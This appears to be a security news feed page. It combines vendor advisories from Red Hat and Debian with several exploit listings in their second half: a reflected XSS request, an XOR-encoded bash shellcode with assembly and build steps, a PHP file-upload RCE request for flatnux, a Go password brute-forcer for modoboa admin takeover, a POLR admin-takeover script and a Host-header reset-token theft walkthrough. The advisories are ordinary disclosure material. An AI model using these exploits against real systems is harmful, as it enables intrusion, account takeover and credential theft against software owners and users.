Red Hat Security Advisory 2023-1666-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Issues addressed include a use-after-free vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2023:1666-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:1666  
Issue date:        2023-04-05  
CVE Names:         CVE-2022-3564 CVE-2023-0266  
====================================================================  
1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux  
8.2 Update Services for SAP Solutions.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS E4S (v. 8.2) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* kernel: use-after-free caused by l2cap_reassemble_sdu() in  
net/bluetooth/l2cap_core.c (CVE-2022-3564)

* ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF  
(CVE-2023-0266)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2150999 - CVE-2022-3564 kernel: use-after-free caused by l2cap_reassemble_sdu() in net/bluetooth/l2cap_core.c  
2163379 - CVE-2023-0266 ALSA: pcm: Move rwsem lock inside snd_ctl_elem_read to prevent UAF

6. Package List:

Red Hat Enterprise Linux BaseOS E4S (v. 8.2):

Source:  
kpatch-patch-4_18_0-193_100_1-1-1.el8_2.src.rpm  
kpatch-patch-4_18_0-193_91_1-1-5.el8_2.src.rpm  
kpatch-patch-4_18_0-193_93_1-1-4.el8_2.src.rpm  
kpatch-patch-4_18_0-193_95_1-1-3.el8_2.src.rpm  
kpatch-patch-4_18_0-193_98_1-1-2.el8_2.src.rpm

ppc64le:  
kpatch-patch-4_18_0-193_100_1-1-1.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_100_1-debuginfo-1-1.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_100_1-debugsource-1-1.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_91_1-1-5.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_91_1-debuginfo-1-5.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_91_1-debugsource-1-5.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_93_1-1-4.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_93_1-debuginfo-1-4.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_93_1-debugsource-1-4.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_95_1-1-3.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_95_1-debuginfo-1-3.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_95_1-debugsource-1-3.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_98_1-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_98_1-debuginfo-1-2.el8_2.ppc64le.rpm  
kpatch-patch-4_18_0-193_98_1-debugsource-1-2.el8_2.ppc64le.rpm

x86_64:  
kpatch-patch-4_18_0-193_100_1-1-1.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_100_1-debuginfo-1-1.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_100_1-debugsource-1-1.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_91_1-1-5.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_91_1-debuginfo-1-5.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_91_1-debugsource-1-5.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_93_1-1-4.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_93_1-debuginfo-1-4.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_93_1-debugsource-1-4.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_95_1-1-3.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_95_1-debuginfo-1-3.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_95_1-debugsource-1-3.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_98_1-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_98_1-debuginfo-1-2.el8_2.x86_64.rpm  
kpatch-patch-4_18_0-193_98_1-debugsource-1-2.el8_2.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-3564  
https://access.redhat.com/security/cve/CVE-2023-0266  
https://access.redhat.com/security/updates/classification/#important

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2023 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBZC3229zjgjWX9erEAQiL+A/+NOyHg8CQMkUZ6MraUJ3el5RMUX9IhaN0  
8qbn1a0QbqFmSgDDV6dBNesP2lMDxWDQzOvjdnlxoBbSUZs83xN/3vWdnVLrcF28  
fR8jEjGDc00III4SnRUYyZ9uhbQ+k6ebP0594sbYuX+rRPu8HwSAlBFhNd4grTnz  
G34vQMVYVO+yYBsvsJwiNfHS6uBxFnYE0qn+SQhZOudE6a3HyUZY9q8UGBNSGqw1  
VgW3uhAU1KxNHAwRzUxDhsL8ZttrCCFnrNro3c/zQq0GLudZIcstky80eoqbzbNB  
n60cy7czC1yQhBthjuX+4Eq89RPxKn8X3YcEP4HQmBOG3Mmqkp5Cl0QzxPcm08Tu  
AjuCqerWFpthrV77gEgDc/LlyvZSLqESJMDl1l0hjIP72QLVC+zyjg0phsMajvHg  
1gw8zrROGMoRAO9maLTiKXBLwoIJyEoiIzI1diQG0CRVXcyHyGp3DjlwSKZdgKL8  
8caahfVtizZzjZvCF3Ify5hsG8cJuzA8ub1CD76GhaTh7fr5/VTjNwtKn6p6//hH  
TiLWDH4sIwHb5eq5j9PD1wsTAGBCj5wHH4OVHU9I8AYu7mLZM3QS16mwjpp3SDoN  
KczhZ6AcyrJXrC3cfvMGNIRZ2SVJyZujNS86j1/6gTY9+N4j3W5/uVWu0ar3/OpW  
hBJiC4nzGno=J0x3  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2023-1666-01

Debian Linux Security Advisory 5383-1 - It was discovered that Ghostscript, the GPL PostScript/PDF interpreter, is prone to a buffer overflow vulnerability in the (T)BCP encoding filters, which could result in the execution of arbitrary code if malformed document files are processed (despite the -dSAFER sandbox being enabled).

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5383-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoApril 05, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : ghostscriptCVE ID         : CVE-2023-28879Debian Bug     : 1033757It was discovered that Ghostscript, the GPL PostScript/PDF interpreter,is prone to a buffer overflow vulnerability in the (T)BCP encodingfilters, which could result in the execution of arbitrary code ifmalformed document files are processed (despite the -dSAFER sandboxbeing enabled).For the stable distribution (bullseye), this problem has been fixed inversion 9.53.3~dfsg-7+deb11u4.We recommend that you upgrade your ghostscript packages.For the detailed security status of ghostscript please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/ghostscriptFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmQt3rNfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0SoRRAAiGi3uTGuwMOc2Nh6RAqZ+vUewF+B0NUkGFAI0SJCaD5J8ka0qLDoG9pNzm5hotukboDIkG+r6jYE0BpGGReQNtstsmQfFUc8HWbe7wyTNv+r8HADU9Cfe44RJd1yVokt4opHU16D+OJC4Ffdm0iQt6iW1Ua2MbftJH7IF1c+fL7wST45WZz6z6dlac0cRPHn17JMH9oH0fsR+A2dBrCIIVdAQT2Rb1y9WpzAALZ92PfNA0DsCqytkaod6Xxd8lYGVd46nFz8gcpGi6JSrGxnegTlc4QWkTF5Xvn1hTyzN4ciWHhzzvE1IzWinFUtELH3/1vbhcyGRFSjjzcfSZhkYqnAFeA28skgTaNV4W8M3RxvPSSd6ElcUvJEqX1Sk3o6q4fKLS42bnNAlB54FsJGsoue4ihn+1gOwp6bVTHmyOPAWbdZeVWrCfllsA3JyGTcGw8pkDxxXfYJk+QnFtH6h+X5/tBXL2iXxpKTd1i65ZGnEQF5VRR9WE4Mx/afmsE7az6MS6m6GffiH9dyp+zRPKnvPMWdABatNYXPDUpl4ciFQC3BcU7lcJ7b56nvAycgRRiAcAMO8q88jDAN9TABrAupW/Z9psa27ANGp4qpdJ9mIpeQI+T1bfAwJjtlKgN6zU63Ij8CiZeVEWbMAm5McRldbC3jiWYv2W/RSOmL7So=ZcFg-----END PGP SIGNATURE-----

Debian Security Advisory 5383-1

Debian Linux Security Advisory 5381-1 - Several security vulnerabilities have been discovered in the Tomcat servlet and JSP engine.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA512

- -------------------------------------------------------------------------  
Debian Security Advisory DSA-5381-1                   security@debian.org  
https://www.debian.org/security/                          Markus Koschany  
April 05, 2023                        https://www.debian.org/security/faq  
- -------------------------------------------------------------------------

Package        : tomcat9  
CVE ID         : CVE-2022-42252 CVE-2022-45143 CVE-2023-28708  
Debian Bug     : 1033475

Several security vulnerabilities have been discovered in the Tomcat  
servlet and JSP engine.

CVE-2022-42252

    Apache Tomcat was configured to ignore invalid HTTP headers via setting  
    rejectIllegalHeader to false. Tomcat did not reject a request containing an  
    invalid Content-Length header making a request smuggling attack possible if  
    Tomcat was located behind a reverse proxy that also failed to reject the  
    request with the invalid header.

CVE-2022-45143

    The JsonErrorReportValve in Apache Tomcat did not escape the type, message  
    or description values. In some circumstances these are constructed from  
    user provided data and it was therefore possible for users to supply values  
    that invalidated or manipulated the JSON output.

CVE-2023-28708

    When using the RemoteIpFilter with requests received from a reverse proxy  
    via HTTP that include the X-Forwarded-Proto header set to https, session  
    cookies created by Apache Tomcat did not include the secure attribute. This  
    could result in the user agent transmitting the session cookie over an  
    insecure channel.

For the stable distribution (bullseye), these problems have been fixed in  
version 9.0.43-2~deb11u6.

We recommend that you upgrade your tomcat9 packages.

For the detailed security status of tomcat9 please refer to  
its security tracker page at:  
https://security-tracker.debian.org/tracker/tomcat9

Further information about Debian Security Advisories, how to apply  
these updates to your system and frequently asked questions can be  
found at: https://www.debian.org/security/

Mailing list: debian-security-announce@lists.debian.org  
-----BEGIN PGP SIGNATURE-----

iQKTBAEBCgB9FiEErPPQiO8y7e9qGoNf2a0UuVE7UeQFAmQt0zZfFIAAAAAALgAo  
aXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldEFD  
RjNEMDg4RUYzMkVERUY2QTFBODM1RkQ5QUQxNEI5NTEzQjUxRTQACgkQ2a0UuVE7  
UeTvzxAAhrAcR/ZgJwe/4qeekO90f4YaCAoJhq7Fq4K6Wj5yM8dllX1IgTy7sweC  
G/GLe62O5snepEI6Fjfy3exkKieSYvsinGxUUcn3CjPYgpLfEDrRGhpWY1y0NPhQ  
NC6iFud2yJIfqI0Ns6h6rhq3F1Blp8iqBWqQiNdEAnZR+jqgqw/qtfa2GbsMLwI2  
so5EZBS3I2of6dCdvS71z8h2Mwf6AbsJh9f96BzlbnNZbGGGp46aIq/VtBUGwrtq  
CA8jrBNtsRT4sMsNp/qqbwLJwkSUxrOqALmJT35FGx9UnZCRld/UNonDpOM85Kia  
GdWE9aJ/A8p+i7vOivNserDBplDnWqug+NygYBmDUigwWfn2mqFIZvBbnp7lQp1z  
udNdTrvSnBSvLSnFUk97Qk3+oTLIO5YtmtXoHCDcGoKe6BAUbe9VYvHDNCNSDfD+  
vu2nv4cLGtI7SKNRN64B7d44z/sDK6o3ymGZEI+HT8dNFTA702m1AuDl/P/Zms7I  
2WKewbQBYrPbLOZE7sreyK8r84EAWR6o4VFAI/pkggckiFWcwdBVVsn0AV1WbtKo  
Z0R6DBFeyaYNrNh8TUDomJRySrV3sft48b5fLBNm6TQUzuTjbRLO0wYVXGywIU45  
aafJ+8bOP9EjhEF+erSIW7/dMm07hODtSL5QymPQlvmDmq7JM7g=XJMU  
-----END PGP SIGNATURE-----

Debian Security Advisory 5381-1

Debian Linux Security Advisory 5382-1 - It was reported that cairosvg, a SVG converter based on Cairo, can send requests to external hosts when processing specially crafted SVG files with external file resource loading. An attacker can take advantage of this flaw to perform a server-side request forgery or denial of service. Fetching of external files is disabled by default with this update.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5382-1                   security@debian.orghttps://www.debian.org/security/                     Salvatore BonaccorsoApril 05, 2023                        https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : cairosvgCVE ID         : CVE-2023-27586Debian Bug     : 1033295It was reported that cairosvg, a SVG converter based on Cairo, can sendrequests to external hosts when processing specially crafted SVG fileswith external file resource loading. An attacker can take advantage ofthis flaw to perform a server-side request forgery or denial of service.Fetching of external files is disabled by default with this update.For the stable distribution (bullseye), this problem has been fixed inversion 2.5.0-1.1+deb11u1.We recommend that you upgrade your cairosvg packages.For the detailed security status of cairosvg please refer to itssecurity tracker page at:https://security-tracker.debian.org/tracker/cairosvgFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQKTBAEBCgB9FiEERkRAmAjBceBVMd3uBUy48xNDz0QFAmQt1clfFIAAAAAALgAoaXNzdWVyLWZwckBub3RhdGlvbnMub3BlbnBncC5maWZ0aGhvcnNlbWFuLm5ldDQ2NDQ0MDk4MDhDMTcxRTA1NTMxRERFRTA1NENCOEYzMTM0M0NGNDQACgkQBUy48xNDz0SHSA/+JRGHd5ccJTCZWYjtXDsq3tjP77dofbJW24Q+jEa22iQNkHHaW+k7jA+0DupIu6apNuA8WoGbBYEA24zG0c/XplIKYC7N0e+23wrX0pbamNyENIkWtFKSeY0UnYcNCSD+rL3GasVKiUOvdaWk7PZqxgIU1+ORgnvDVUHY2BB15cEVDKAvcwIrd71KkU6JbGdAoufek30UszsyMTs+ULp00uErgzq3jrxnJ5NCAnj8i7sI+DGY/aqEkOFEgZi7gIRDkK68VPMxQAUFCB7n/vIsqFrJTdwJ3xIhaZixEXgbLr4TBY1VhqixljNijSq2A72lTqotiKbXLiBy8l2vf+9T1au9qhImMViN3Sr6NDm3mjc/2wQv8ECopMiXMsbaJOjS/Fslbzc6jleK+xvhwkpwqbOYd9eyhX5FEEGdzHRJR093dy7Rp1t58QIkjOw4gS5psq6YEDtcTwyA7CAUZpZ0KGPiaM9+sY68iFsIa/b3HKnkGD+/Xp727CZLStSTYx/LOB/VSGOhxmSxQMpVJ9UMcFoCFfq+4xij1losWprs4nbEa/4CsPWWYuL/eWuMywMvev9adj55x6voruJ2eKxFFiQ+wR2JcdKXY5oXqzNAfjKLLHPjzq2co0OsIJ9x3kAM9eCct13Iq1gsz4tuj3zJgI4458cci5iMiRKjwdsClAM=vgG/-----END PGP SIGNATURE-----

Debian Security Advisory 5382-1

Universal Media Server version 13.2.1 suffers from a cross site scripting vulnerability.

    # Exploit Title: Universal Media Server 13.2.1 Cross Site Scripting # Google Dork: NA# Date: 01/04/2023# Exploit Author: Yehia Elghaly - Mrvar0x# Vendor Homepage: https://www.universalmediaserver.com/# Software Link: https://www.universalmediaserver.com/download/# Version: 13.2.1# Tested on: Windows 7 / 10# CVE: N/ASummary: Universal Media Server is a free DLNA, UPnP and HTTP/S Media Server.Support all major operating systems, with versions for Windows, Linux and macOS.Description: The attacker can able to convince a victim to visit a URL referencing a vulnerable page, malicious JavaScript content may be executed within the context of the victim's browser.: Reflected XSS found on the follwoing paths GET /%3Cscript%3Ealert('XSSYF')%3C/script%3E HTTP/1.1Host: 172.16.110.132:9001User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/111.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeUpgrade-Insecure-Requests: 1[Affected Component]//about/accounts/actions/logs/player/settings/shared/v1/api/about/|echo

Universal Media Server 13.2.1 Cross Site Scripting

71 bytes small Linux/x86_64 bash shellcode with XOR encoding.

    Exploit Title: Linux/x86_64 - bash shellcode with xor encodingDate: 05/02/2023Exploit Author: Jeenika AnadaniContact: https://twitter.com/cyber_jeeniCategory: ShellcodeArchitectue: Linux x86_64Shellcode Length: 71 Bytes-----------------------section .datasection .text  global _start_start:  ; set up argv and envp arrays for execve()  xor rax, rax  mov [rsp-8], rax  mov qword [rsp-16], 0x72613162 ; encrypted 'bash'  xor byte [rsp-16], 0x08  xor byte [rsp-15], 0x16  xor byte [rsp-14], 0x24  xor byte [rsp-13], 0x32  lea rdx, [rsp-16]  mov qword [rsp-24], rdx  mov qword [rsp-32], rdx  lea rdi, [rsp-32]  ; call execve()  xor eax, eax  mov al, 59  syscall  ; exit with status code 0  xor eax, eax  mov ebx, eax  mov al, 60  syscall-----------#### Explanation:This code uses XOR encryption to obscure the name of the program being executed, `"bash"`. The XOR encryption key is `0x08162432`, which is applied to each byte of the string. The decryption is performed just before calling `execve`, so the program name is passed in its original form.The rest of the code is the same as the previous example, making a system call to the `execve` function and then calling the `exit` syscall to terminate the process.---------### Compilation AND Execution:To run the x86_64 assembly code on a Linux system, you need to assemble it into an executable file and then run the file. Here are the steps:1.  Save the code to a file with a `.asm` extension, for example `bash.asm`.   2.  Assemble the code into an object file using an assembler, such as NASM:  `nasm -f elf64 -o bash.o bash.asm`The `-f elf64` option specifies that the output format should be ELF64 (Executable and Linkable Format), and the `-o` option specifies the name of the output file, `bash.o`.    3.  Link the object file to produce an executable file using the `ld` linker:  `ld -s -o bash bash.o`The `-s` option removes the symbol table from the output file to make it smaller, and the `-o` option specifies the name of the output file, `bash`.    4. Make the file executable:  `chmod +x bash`5. Finally, you can run the file:  `./bash`---------------------

Linux/x86_64 Bash Shellcode

flatnux version 2021-03.25 suffers from a remote code execution vulnerability.

    # Exploit Title: flatnux-2021-03.25 - Remote Code Execution (Authenticated)# Exploit Author: Ömer Hasan Durmuş# Vendor Homepage: https://en.altervista.org# Software Link: http://flatnux.altervista.org/flatnux.html# Version: 2021-03.25# Tested on: Windows/LinuxPOST/flatnux/filemanager.php?mode=t&filemanager_editor=ckeditor4&dir=misc/media/news&CKEditor=fckeditorsummary_en&CKEditorFuncNum=1&langCode=enHTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0)Gecko/20100101 Firefox/109.0Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: multipart/form-data;boundary=---------------------------393526031113460918603940283286Content-Length: 413Origin: http://localhostConnection: closeReferer:http://localhost/flatnux/controlcenter.php?page___xdb_news=1&opt=fnc_ccnf_section_news&mod=news&mode=edit&pk___xdb_news=1&desc_=1&order___xdb_news=date&op___xdb_news=insnewCookie: fnuser=admin; secid=fe0d39d41d63bec72eda06bbc7942015; lang=en;ckCsrfToken=BFS3h505LnG9r0um2NcRBRbHklciwy5qj0Aw3xsbUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: iframeSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1-----------------------------393526031113460918603940283286Content-Disposition: form-data; name="upload"; filename="info.php"Content-Type: application/octet-stream<?php phpinfo(); ?>-----------------------------393526031113460918603940283286Content-Disposition: form-data; name="ckCsrfToken"BFS3h505LnG9r0um2NcRBRbHklciwy5qj0Aw3xsb-----------------------------393526031113460918603940283286--

flatnux 2021-03.25 Remote Code Execution

modoboa version 2.0.4 suffers from an administrative takeover vulnerability.

    /* # Exploit Title: modoboa  2.0.4 - Admin TakeOver # Description: Authentication Bypass by Primary Weakness # Date: 02/10/2023# Software Link: https://github.com/modoboa/modoboa# Version: modoboa/modoboa prior to 2.0.4# Tested on: Arch Linux # Exploit Author: 7h3h4ckv157# CVE: CVE-2023-0777 */package mainimport (  "fmt"  "io/ioutil"  "net/http"  "os"  "strings"  "time")func main() {  fmt.Println("\n\t*** ADMIN TAKEOVER ***\n")  host := getInput("Enter the target host: ")  username := getInput("Enter the Admin's Name: ")  passwordFile := getInput("Provide the path for Password-Wordlist: ")  passwords, err := readLines(passwordFile)  if err != nil {    fmt.Println("Error reading password file:", err)    os.Exit(1)  }  for _, password := range passwords {    data := fmt.Sprintf("-----------------------------25524418606542250161357131552\r\nContent-Disposition: form-data; name=\"username\"\r\n\r\n%s\r\n-----------------------------25524418606542250161357131552\r\nContent-Disposition: form-data; name=\"password\"\r\n\r\n%s\r\n-----------------------------25524418606542250161357131552--\r\n\r\n", username, password)    headers := map[string]string{      "Host":           host,      "User-Agent":     "Anonymous",      "Accept":         "text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8",      "Accept-Language": "en-US,en;q=0.5",      "Accept-Encoding": "gzip, deflate",      "Content-Type":   "multipart/form-data; boundary=---------------------------25524418606542250161357131552",    }    resp, err := postRequest(fmt.Sprintf("https://%s/api/v2/token/", host), headers, data)    if err != nil {      fmt.Println("Error sending request:", err)      os.Exit(1)    }    if resp.StatusCode == 200 {      fmt.Printf("\n\tValid password Found: %s\n", password)      break    } else {      fmt.Printf("Invalid password: %s\n", password)    }    // Delay the next request to limit the requests per second    delay := time.Duration(1000000000/50) * time.Nanosecond    time.Sleep(delay)  }}// Read the lines from a file and return them as a slice of stringsfunc readLines(filename string) ([]string, error) {  content, err := ioutil.ReadFile(filename)  if err != nil {    return nil, err  }  return strings.Split(string(content), "\n"), nil}// Send a POST request with the given headers and datafunc postRequest(url string, headers map[string]string, data string) (*http.Response, error) {  req, err := http.NewRequest("POST", url, strings.NewReader(data))  if err != nil {    return nil, err  }  for key, value := range headers {    req.Header.Set(key, value)  }  client := &http.Client{}  resp, err := client.Do(req)  if err != nil {    return nil, err  }  return resp, nil}// Get user input and return the trimmed valuefunc getInput(prompt string) string {  fmt.Print(prompt)  var input string  fmt.Scanln(&input)  return strings.TrimSpace(input)}

modoboa 2.0.4 Admin Takeover

POLR URL version 2.3.0 suffers from an administrative takeover vulnerability.

    # Exploit Title: POLR URL 2.3.0 - Shortener Admin Takeover# Date: 2021-02-01# Exploit Author: p4kl0nc4t <me-at-lcat-dot-dev># Vendor Homepage: -# Software Link: https://github.com/cydrobolt/polr# Version: < 2.3.0# Tested on: Linux# CVE : CVE-2021-21276import jsonimport requestspayload = {    'acct_username': 'admin',    'acct_password': 'password',    'acct_email': 'email@youremail.com',    'setup_auth_key': True,}r = requests.get('http://localhost/setup/finish',                 cookies={'setup_arguments': json.dumps(payload)})print(r.text)

POLR URL 2.3.0 Shortener Admin Takeover

LDAP Tool Box Self Service Password version 1.5.2 suffers from an account takeover vulnerability.

    # Exploit Title:  LDAP Tool Box Self Service Password v1.5.2 -  Account takeover# Date: 02/17/2023# Exploit Author: Tahar BENNACEF (aka tar.gz)# Software Link: https://github.com/ltb-project/self-service-password# Version: 1.5.2# Tested on: UbuntuSelf Service Password is a PHP application that allows users to changetheir password in an LDAP directory.It is very useful to get back an account with waiting an action from anadministration especially in Active Directory environmentThe password reset feature is prone to an HTTP Host header vulnerabilityallowing an attacker to tamper the password-reset mail sent to his victimallowing him to potentially steal his victim's valid reset token. Theattacker can then use it to perform account takeover*Step to reproduce*1. Request a password reset request targeting your victim and setting inthe request HTTP Host header the value of a server under your controlPOST /?action=sendtoken HTTP/1.1Host: *111.111.111.111*User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 16Origin: https://portal-lab.ngp.infraReferer: https://portal-lab.ngp.infra/?action=sendtokenUpgrade-Insecure-Requests: 1Sec-Fetch-Dest: documentSec-Fetch-Mode: navigateSec-Fetch-Site: same-originSec-Fetch-User: ?1Te: trailersConnection: closelogin=test.resetAs the vulnerable web application's relying on the Host header of thepassword-reset request to craft the password-reset mail. The victimreceive a mail with a tampered link[image: image.png]2. Start a webserver and wait for the victim to click on the linkIf the victim click on this tampered link, he will sent his password resettoken to the server set in the password-reset request's HTTP Host header[image: image.png]3. Use the stolen token to reset victim's account passwordBest regards

Tag

#linux